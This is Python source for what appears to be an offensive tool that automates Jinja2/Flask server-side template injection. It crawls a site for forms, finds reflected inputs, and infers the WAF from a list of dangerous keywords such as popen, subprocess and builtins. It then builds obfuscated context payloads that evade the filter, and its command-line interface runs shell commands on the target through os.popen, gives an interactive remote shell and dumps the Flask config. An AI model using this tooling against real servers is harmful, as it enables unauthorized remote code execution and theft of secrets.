"""扫描指定的网站并返回所有表格

"""

import logging
from typing import Union, Generator, Tuple, List
from .form import parse_forms, Form
from .requester import Requester
from bs4 import BeautifulSoup

logger = logging.getLogger("scan_url")


def parse_urls(html: Union[str, BeautifulSoup]) -> list:
    """从html中解析出所有的链接

    Args:
        html (str|BeautifulSoup): HTML

    Returns:
        List[str]: 所有链接
    """
    if isinstance(html, str):
        bs_obj = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs_obj = html

    return [
        element.attrs["href"]
        for element in bs_obj.select("a")
        if "href" in element
    ]


def yield_form(
    requester: Requester, start_url: str
) -> Generator[Tuple[str, List[Form]], None, None]:
    """根据起始URL扫描出所有的表格

    Args:
        requester (Requester): HTTP工具类Requester
        start_url (str): 起始URL

    Yields:
        Generator[Tuple[str, List[Form]], None, None]:
            所有URL与其中的表格
    """
    found = False
    targets = [
        start_url,
    ]
    visited = set()
    while targets:
        target_url = targets.pop(0)
        if target_url in visited:
            continue
        visited.add(target_url)

        resp = requester.request(method="GET", url=target_url)
        if resp is None:
            logger.warning("Fetch URL %s failed!", target_url)
            continue
        html = BeautifulSoup(resp.text, "html.parser")
        forms = parse_forms(target_url, html)

        if forms:
            yield target_url, forms
            found = True
        targets += parse_urls(html)
    if not found:
        logger.warning("Exit without finding <form> element")



"""攻击指定的表单

"""

from collections import namedtuple
import logging
from typing import List, Dict, Union, Callable

from .form import random_fill, fill_form, Form
from .requester import Requester
from .colorize import colored
from .const import (
    CALLBACK_SUBMIT,
    CALLBACK_TEST_FORM_INPUT,
    OS_POPEN_READ,
    DETECT_MODE_ACCURATE,
)
from .waf_func_gen import WafFuncGen
from .full_payload_gen import FullPayloadGen

logger = logging.getLogger("form_cracker")
Result = namedtuple("Result", "full_payload_gen input_field")


class FormCracker:
    """对指定的文档进行攻击
    其接受一个表格及其对应的URL，还有一个用于发送请求的requester。
    其会根据一系列危险的关键字获取被WAF时页面的hash, 据此生成一个waf函数用于生成payload
    """

    test_cmd = "echo f3n  j1ng;"
    test_result = "f3n j1ng"
    test_vulunable_inputs_times = 5

    def __init__(
        self,
        url: str,
        form: Form,
        requester: Requester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        detect_mode: str = DETECT_MODE_ACCURATE,
    ):
        """生成用于攻击form的类

        Args:
            url (str, optional): form所在的url.
            form (dict): 解析后的form元素
            requester (Requester, optional): 用于发出请求的requester，为None时自动构造.
            callback (Union[Callable[[str, Dict], None], None]):
                callback函数，在完成某些阶段后会调用此函数
        """
        self.url = url
        self.form = form
        self.req = requester
        self._callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.waf_func_gen = WafFuncGen(
            self.url,
            self.form,
            self.req,
            self.callback,
            detect_mode=detect_mode,
        )
        self.detect_mode = detect_mode

    @property
    def callback(self):
        """Callback函数

        Returns:
            Callable: Callback函数
        """
        return self._callback

    @callback.setter
    def callback(self, callback):
        self._callback = callback

    def vulunable_inputs(self) -> List[str]:
        """解析出form中有回显的input

        Returns:
            List[str]: 所有有回显的input name
        """
        answers = []
        for _ in range(self.test_vulunable_inputs_times):
            fill_dict = random_fill(self.form)
            r = self.req.request(
                **fill_form(self.url, self.form, form_inputs=fill_dict)
            )
            assert r is not None
            answers += [k for k, v in fill_dict.items() if v in r.text]
        return list(set(answers))

    def submit(self, inputs: dict):
        """根据inputs提交form

        Args:
            inputs (dict): 需要提交的input

        Returns:
            requests.Response: 返回的reponse元素
        """
        all_length = sum(len(v) for v in inputs.values())
        if all_length > 2048 and self.form["method"] == "GET":
            logger.warning(
                "inputs are extremely long (len=%d) that "
                + "the request might fail",
                all_length,
            )

        resp = self.req.request(**fill_form(self.url, self.form, inputs))

        self.callback(
            CALLBACK_SUBMIT,
            {
                "form": self.form,
                "inputs": inputs,
                "response": resp,
            },
        )

        return resp

    def test_input(self, input_field: str, payload: str) -> bool:
        """测试对应的表单项是否有回显

        Args:
            input_field (str): 表单项
            payload (str): 表单项的值

        Returns:
            bool: 是否有回显
        """
        logger.info(
            "Input %s looks great, testing generated payload.",
            colored("yellow", repr(input_field)),
        )
        resp = self.submit({input_field: payload})
        assert resp is not None
        return self.test_result in resp.text

    def crack_inputs(self, input_field: str) -> Union[Result, None]:
        """攻击对应的input

        Args:
            input_field (str): 需要攻击的input

        Returns:
            Union[Result, None]: 对应的payload生成函数，以及对应的input
        """
        logger.info("Testing %s", colored("yellow", input_field))

        waf_func = self.waf_func_gen.generate(input_field)
        full_payload_gen = FullPayloadGen(
            waf_func, callback=self.callback, detect_mode=self.detect_mode
        )
        payload, will_print = full_payload_gen.generate(
            OS_POPEN_READ, self.test_cmd
        )
        if payload is None:
            self.callback(
                CALLBACK_TEST_FORM_INPUT,
                {
                    "ok": False,
                },
            )
            return None
        # payload测试成功时为True, 失败时为False, 无法测试为None
        is_test_success = None
        if will_print:
            if self.test_input(input_field, payload):
                logger.info(
                    "%s Now we can generate payloads.",
                    colored("green", "Success!", bold=True),
                )
                is_test_success = True
            else:
                logger.info(
                    "%s! Generated payloads might be useless.",
                    colored("yellow", "Test Payload Failed", bold=True),
                )
        else:
            logger.info(
                "Input %s looks great, "
                + "but we WON'T SEE the execution result! "
                + "You can try generating payloads anyway.",
                input_field,
            )

        self.callback(
            CALLBACK_TEST_FORM_INPUT,
            {
                "ok": True,
                "will_print": will_print,
                "test_success": is_test_success,
                "input_field": input_field,
            },
        )
        return Result(
            full_payload_gen=full_payload_gen, input_field=input_field
        )

    def crack(self) -> Union[Result, None]:
        """攻击表单

        Returns:
            Union[Result, None]: 对应的payload生成函数，以及对应的input
        """
        logger.info("Start cracking %s", self.form)
        vulunables = self.vulunable_inputs()
        logger.info(
            "These inputs might be vulunable: %s",
            colored("yellow", repr(vulunables)),
        )

        for input_field in vulunables:
            result = self.crack_inputs(input_field)
            if result:
                return result
        logger.warning("Failed...")
        return None



"""提供上下文的payload, 为最终的payload提供一系列变量

"""

from typing import Iterable, Dict, Any, Callable

# 所有的上下文payload, 存储格式为: {payload: {变量名：变量值}}

ContextPayloads = Dict[str, Dict[str, Any]]

context_payloads_all: ContextPayloads = {
    "{%set oa={}|int%}{%set la=oa**oa%}{%set lla=(la~la)|int%}"
    + "{%set llla=(lla~la)|int%}{%set lllla=(llla~la)|int%}": {
        "oa": 0,
        "la": 1,
        "lla": 11,
        "llla": 111,
        "lllla": 1111,
    },
    "{%set ob={}|int%}{%set lb=ob**ob%}{%set llb=(lb~lb)|int%}"
    + "{%set lllb=(llb~lb)|int%}{%set llllb=(lllb~lb)|int%}"
    + "{%set bb=llb-lb-lb-lb-lb-lb%}{%set sbb=lllb-llb-llb-llb-llb-llb%}"
    + "{%set ssbb=llllb-lllb-lllb-lllb-lllb-lllb%}"
    + "{%set zzeb=llllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb%}": {
        "ob": 0,
        "lb": 1,
        "llb": 11,
        "lllb": 111,
        "llllb": 1111,
        "bb": 6,
        "sbb": 56,
        "ssbb": 556,
        "zzeb": 223,
    },
    "{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}": {
        "zols": 2015
    },
    "{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}": {
        "ltr": 178
    },
    "{%set lea=namespace|escape|urlencode|escape|"
    + "urlencode|urlencode|urlencode|count%}": {"lea": 134},
    "{%set lel=cycler|escape|urlencode|escape|urlenc"
    + "ode|escape|urlencode|escape|urlencode|count%}": {"lel": 131},
    "{%set qo=namespace|escape|urlencode|escape|urlencode|count%}": {
        "qo": 90
    },
    "{%set bs=cycler|escape|urlencode|count%}": {"bs": 65},
    "{%set ab=namespace|escape|count%}": {"ab": 46},
    "{%set zb={}|escape|list|escape|count%}": {"zb": 26},
    "{%set t=joiner|urlencode|wordcount%}": {"t": 7},
    "{%set b={}|escape|urlencode|count%}": {"b": 6},
    "{%set e=(dict(a=x,b=x,c=x)|count)%}": {"e": 3},
    "{%set l={}|escape|first|count%}": {"l": 1},
    "{%set un=((({}|select()|trim|list)[24]))%}": {"un": "_"},
    "{%set perc=(lipsum[((({}|select()|trim|list)[24]))*2+"
    + "dict(globals=x)|join+((({}|select()|trim|list)[24]))*2][((({}|select()"
    + "|trim|list)[24]))*2+dict(builtins=x)|join+((({}|select()|trim|list"
    + ")[24]))*2][dict(chr=x)|join](37))%}": {"perc": "%"},
}


def filter_by_waf(
    context_payloads: ContextPayloads, waf: Callable[[str], bool]
) -> ContextPayloads:
    """根据WAF函数去除所有不能通过WAF的payload

    Args:
        context_payloads (ContextPayloads): 需要过滤的ContextPayload
        waf (Callable[[str], bool]): WAF函数，

    Returns:
        ContextPayloads: 过滤后的ContextPayload
    """
    return {
        payload: d for payload, d in context_payloads.items() if waf(payload)
    }


def filter_by_used_context(
    context_payloads: ContextPayloads, used_context: Iterable
) -> ContextPayloads:
    """根据已经使用的变量列表过滤上下文payload

    Args:
        context_payloads (ContextPayloads): 需要过滤的ContextPayload
        used_context (Iterable): 使用的变量名

    Returns:
        ContextPayloads: 过滤后的ContextPayloads
    """
    return {
        payload: d
        for payload, d in context_payloads.items()
        if any(var_name in used_context for var_name in d.keys())
    }



"""根据指定的表单生成对应的WAF函数

"""

from collections import Counter, namedtuple
from functools import lru_cache
import logging
from typing import Dict, Callable, Union
import random
import string

from .const import (
    CALLBACK_SUBMIT,
    DETECT_MODE_ACCURATE,
)
from .form import fill_form, Form
from .requester import Requester
from .colorize import colored


logger = logging.getLogger("waf_func_gen")
Result = namedtuple("Result", "payload_generate_func input_field")

dangerous_keywords = [
    '"',
    "'",
    "+",
    ".",
    "0",
    "1",
    "2",
    "=",
    "[",
    "_",
    "%",
    "attr",
    "builtins",
    "chr",
    "class",
    "config",
    "eval",
    "global",
    "include",
    "lipsum",
    "mro",
    "namespace",
    "open",
    "pop",
    "popen",
    "read",
    "request",
    "self",
    "subprocess",
    "system",
    "url_for",
    "value",
    "{{",
    "|",
    "}}",
    "~",
]

random.shuffle(dangerous_keywords)


class WafFuncGen:
    """
    根据指定的表单生成对应的WAF函数
    """

    def __init__(
        self,
        url: str,
        form: Form,
        requester: Requester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        detect_mode: str = DETECT_MODE_ACCURATE,
    ):
        """根据指定的表单生成对应的WAF函数

        Args:
            url (str): form所在的url.
            form (dict): 解析后的form元素
            requester (Requester): 用于发出请求的requester，为None时自动构造.
            callback (Union[Callable[[str, Dict], None], None], optional):
                callback函数，默认为None
            detect_mode (str): 测试WAF页面hash的模式
                "fast": 一次发送多个危险的关键字
                "accurate": 一次发送一个危险的关键字
        """
        self.url = url
        self.form = form
        self.req = requester
        self.callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.detect_mode = detect_mode

    def submit(self, inputs: dict):
        """根据inputs提交form

        Args:
            inputs (dict): 需要提交的input

        Returns:
            requests.Response: 返回的reponse元素
        """
        all_length = sum(len(v) for v in inputs.values())
        if all_length > 2048 and self.form["method"] == "GET":
            logger.warning(
                "inputs are extremely long (len=%d) "
                + "that the request might fail",
                all_length,
            )
        resp = self.req.request(**fill_form(self.url, self.form, inputs))

        self.callback(
            CALLBACK_SUBMIT,
            {
                "form": self.form,
                "inputs": inputs,
                "response": resp,
            },
        )

        return resp

    def waf_page_hash(self, input_field: str):
        """使用危险的payload测试对应的input，得到一系列响应后，求出响应中最常见的几个hash

        Args:
            input_field (str): 需要测试的input

        Returns:
            List[int]: payload被waf后页面对应的hash
        """
        resps = {}
        test_keywords = (
            dangerous_keywords
            if self.detect_mode == DETECT_MODE_ACCURATE
            else [
                "".join(dangerous_keywords[i: i + 3])  # flake8: noqa
                for i in range(0, len(dangerous_keywords), 3)
            ]
        )
        for keyword in test_keywords:
            logger.info(
                "Testing dangerous keyword %s",
                colored("yellow", repr(keyword * 2)),
            )
            resps[keyword] = self.submit({input_field: keyword * 2})
        hashes = [
            hash(r.text)
            for keyword, r in resps.items()
            if r is not None
            and r.status_code != 500
            and keyword not in r.text
        ]
        return [k for k, v in Counter(hashes).items() if v >= 3]

    def generate(self, input_field: str) -> Callable:
        """生成WAF函数

        Args:
            input_field (str): 表格项

        Returns:
            Callable: WAF函数
        """
        waf_hashes = self.waf_page_hash(input_field)

        @lru_cache(1000)
        def waf_func(value):
            extra_content = "".join(
                random.choices(string.ascii_lowercase, k=6)
            )
            resp = self.submit({input_field: extra_content + value})
            assert resp is not None
            if hash(resp.text) in waf_hashes:  # 页面的hash和waf页面的hash相同
                return False
            if resp.status_code == 500:  # Jinja渲染错误
                return True
            return extra_content in resp.text  # 产生回显

        return waf_func



"""命令行界面的入口

"""

import logging
from urllib.parse import urlparse
from typing import Callable, List, Dict
from functools import partial

import click


from .form import get_form
from .form_cracker import FormCracker
from .full_payload_gen import FullPayloadGen
from .scan_url import yield_form
from .requester import Requester
from .const import (
    OS_POPEN_READ,
    DEFAULT_USER_AGENT,
    CONFIG,
    DETECT_MODE_ACCURATE,
)
from .colorize import colored
from .webui import main as webui_main

TITLE = colored(
    "yellow",
    r"""
    ____             _ _
   / __/__  ____    (_|_)___  ____ _
  / /_/ _ \/ __ \  / / / __ \/ __ `/
 / __/  __/ / / / / / / / / / /_/ /
/_/  \___/_/ /_/_/ /_/_/ /_/\__, /
              /___/        /____/

    ------Made with passion by Marven11
""".strip(
        "\n"
    ),
    bold=True,
)
LOGGING_FORMAT = "%(levelname)s:[%(name)s] | %(message)s"

logging.basicConfig(level=logging.INFO, format=LOGGING_FORMAT)
logger = logging.getLogger("cli")


def cmd_exec(
    cmd: str,
    cracker: FormCracker,
    field: str,
    full_payload_gen: FullPayloadGen,
):
    """在目标上执行命令并返回回显

    Args:
        cmd (str): 命令
        cracker (FormCracker): 目标表格对应的FormCracker
        field (str): 提交到的目标项
        full_payload_gen (FullPayloadGen): payload生成器

    Returns:
        str: 回显
    """
    payload, will_print = full_payload_gen.generate(OS_POPEN_READ, cmd)
    logger.info("Submit payload %s", colored("blue", payload))
    if not will_print:
        payload_wont_print = (
            "Payload generator says that this "
            + "payload %s command execution result."
        )
        logger.warning(payload_wont_print, colored("red", "won't print"))
    resp = cracker.submit({field: payload})
    assert resp is not None
    return resp.text


def interact(cmd_exec_func: Callable):
    """根据提供的payload生成方法向用户提供一个交互终端

    Args:
        cmd_exec_func (Callable): 根据输入的shell命令生成对应的payload
    """
    logger.info("Use %s to exit.", colored("cran", "Ctrl+D", bold=True))
    while True:
        try:
            cmd = input("$>> ")
        except EOFError:
            break
        except KeyboardInterrupt:
            break
        result = cmd_exec_func(cmd)
        print(result)


def parse_headers_cookies(
    headers_list: List[str], cookies: str
) -> Dict[str, str]:
    headers = {}
    if headers_list:
        for header in headers_list:
            k, _, v = header.partition(": ")
            if not k or not v:
                logger.warning(f"Failed parsing {repr(header)}, ignored.")
                continue
            if k.capitalize() != k:
                logger.warning(f"Header {k} is not capitalized, fixed.")
                k = k.capitalize()
            headers[k] = v
    if cookies:
        headers["Cookie"] = cookies
    return headers


@click.group()
def main():
    """click的命令组"""


@main.command()
@click.option("--url", "-u", help="form所在的URL")
@click.option("--action", "-a", default=None, help="form的action，默认为当前路径")
@click.option("--method", "-m", default="POST", help="form的提交方式，默认为POST")
@click.option("--inputs", "-i", help="form的参数，以逗号分隔")
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option(
    "--detect-mode", default=DETECT_MODE_ACCURATE, help="分析模式，可为accurate或fast"
)
@click.option(
    "--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent"
)
@click.option("--header", default=[], multiple=True, help="请求时使用的Headers")
@click.option("--cookies", default="", help="请求时使用的Cookie")
def get_config(
    url: str,
    action: str,
    method: str,
    inputs: str,
    interval: float,
    detect_mode: str,
    user_agent: str,
    header: tuple,
    cookies: str,
):
    """
    攻击指定的表单，并获得目标服务器的flask config
    """
    print(TITLE)
    assert all(
        param is not None for param in [url, inputs]
    ), "Please check your param"
    form = get_form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(","),
    )
    requester = Requester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(
            headers_list=list(header), cookies=cookies
        ),
    )
    cracker = FormCracker(
        url=url, form=form, requester=requester, detect_mode=detect_mode
    )
    result = cracker.crack()
    if result is None:
        logger.warning("Test form failed...")
        return
    full_payload_gen, field = result
    payload = full_payload_gen.generate(CONFIG)
    resp = cracker.submit({field: payload})

    print(resp.text if resp is not None else None)
    logger.warning("Bye!")


@main.command()
@click.option("--url", "-u", help="form所在的URL")
@click.option("--action", "-a", default=None, help="form的action，默认为当前路径")
@click.option("--method", "-m", default="POST", help="form的提交方式，默认为POST")
@click.option("--inputs", "-i", help="form的参数，以逗号分隔")
@click.option(
    "--exec-cmd", "-e", default="", help="成功后执行的shell指令，不填则成功后进入交互模式"
)
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option(
    "--detect-mode", default=DETECT_MODE_ACCURATE, help="分析模式，可为accurate或fast"
)
@click.option(
    "--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent"
)
@click.option("--header", default=[], multiple=True, help="请求时使用的Headers")
@click.option("--cookies", default="", help="请求时使用的Cookie")
def crack(
    url: str,
    action: str,
    method: str,
    inputs: str,
    exec_cmd: str,
    interval: float,
    detect_mode: str,
    user_agent: str,
    header: tuple,
    cookies: str,
):
    """
    攻击指定的表单
    """
    print(TITLE)
    assert all(
        param is not None for param in [url, inputs]
    ), "Please check your param"
    form = get_form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(","),
    )
    requester = Requester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(
            headers_list=list(header), cookies=cookies
        ),
    )
    cracker = FormCracker(
        url=url, form=form, requester=requester, detect_mode=detect_mode
    )
    result = cracker.crack()
    if result is None:
        logger.warning("Test form failed...")
        return
    full_payload_gen, field = result
    cmd_exec_func = partial(
        cmd_exec,
        cracker=cracker,
        field=field,
        full_payload_gen=full_payload_gen,
    )
    if exec_cmd == "":
        interact(cmd_exec_func)
    else:
        print(cmd_exec_func(exec_cmd))
    logger.warning("Bye!")


@main.command()
@click.option("--url", "-u", help="需要扫描的URL")
@click.option("--exec-cmd", "-e", default="", help="成功后执行的shell指令，不填则进入交互模式")
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option(
    "--detect-mode", default=DETECT_MODE_ACCURATE, help="检测模式，可为accurate或fast"
)
@click.option(
    "--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent"
)
@click.option("--header", default=[], multiple=True, help="请求时使用的Headers")
@click.option("--cookies", default="", help="请求时使用的Cookie")
def scan(url, exec_cmd, interval, detect_mode, user_agent, header, cookies):
    """
    扫描指定的网站
    """
    print(TITLE)
    requester = Requester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(
            headers_list=list(header), cookies=cookies
        ),
    )
    for page_url, forms in yield_form(requester, url):
        for form in forms:
            cracker = FormCracker(
                url=page_url,
                form=form,
                requester=requester,
                detect_mode=detect_mode,
            )
            result = cracker.crack()
            if result is None:
                continue
            full_payload_gen, field = result
            cmd_exec_func = partial(
                cmd_exec,
                cracker=cracker,
                field=field,
                full_payload_gen=full_payload_gen,
            )
            if exec_cmd == "":
                interact(cmd_exec_func)
            else:
                print(cmd_exec_func(exec_cmd))
            return
    logger.warning("Scan failed...")


@main.command()
@click.option(
    "--host", "-h", default="127.0.0.1", help="需要监听的host, 默认为127.0.0.1"
)
@click.option("--port", "-p", default=11451, help="需要监听的端口, 默认为11451")
def webui(host, port):
    """
    启动webui
    """
    webui_main(host, port)


if __name__ == "__main__":
    main()



"""实际发出网络请求并返回响应
"""

import logging
import traceback
import time

import requests


from .const import DEFAULT_USER_AGENT

logger = logging.getLogger("requester")


class Requester:
    """实际发送HTTP请求的类"""

    def __init__(
        self,
        interval=0.0,
        timeout=10,
        retry_times=5,
        retry_interval=1,
        retry_status=(429,),
        user_agent=DEFAULT_USER_AGENT,
        headers=None,
    ):
        self.interval = interval
        self.timeout = timeout
        self.retry_times = retry_times
        self.retry_interval = retry_interval
        self.retry_status = retry_status
        self.session = requests.Session()
        self.session.headers.update({"User-Agent": user_agent})
        self.last_request_time = 0

        if headers:
            self.session.headers.update(headers)

    def request_once(self, **kwargs):
        """发出一次网络请求，失败时返回None

        Returns:
            Response | None: 返回的响应
        """
        duration = time.perf_counter() - self.last_request_time
        if duration < self.interval:
            time.sleep(self.interval - duration)

        if "timeout" not in kwargs:
            kwargs["timeout"] = self.timeout
        try:
            resp = self.session.request(**kwargs)
        except Exception as exception:  # pylint: disable=W0718
            logging.warning(
                "Exception found when requesting: %s", type(exception)
            )
            logging.debug(traceback.format_exc())
            return None
        if resp.status_code in self.retry_status:
            return None

        self.last_request_time = time.perf_counter()
        return resp

    def request(self, **kwargs):
        """发送请求，自动重试

        Returns:
            Response | None: 响应
        """
        for _ in range(self.retry_times - 1):
            resp = self.request_once(**kwargs)
            if resp:
                return resp
        return self.request_once(**kwargs)
